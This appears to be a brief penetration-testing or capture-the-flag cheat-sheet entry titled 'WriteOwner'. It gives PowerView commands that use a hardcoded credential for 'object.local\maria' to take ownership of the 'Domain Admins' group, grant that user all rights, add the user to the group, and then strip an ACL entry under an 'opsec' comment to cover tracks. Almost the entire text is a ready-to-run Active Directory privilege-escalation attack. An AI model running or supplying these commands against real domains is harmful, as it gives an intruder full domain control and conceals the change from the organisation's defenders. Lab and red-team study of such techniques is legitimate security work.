WriteOwner

User:

Group:

$Password = ConvertTo-SecureString 'W3llcr4ft3d_4cls' -AsPlainText -Force 
$Cred = New-Object System.Management.Automation.PSCredential('object.local\maria', $Password)

# make the user the owner of the group
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity MARIA -Cred $Cred

# add All rights to the user (see https://powersploit.readthedocs.io/en/latest/Recon/Add-DomainObjectAcl/)
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All -Credential $Cred

# add user to domain group
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria' -Credential $Cred

# opsec
Remove-DomainObjectAcl -Credential $cred -TargetIdentity "Domain Admins" -Rights WriteMembers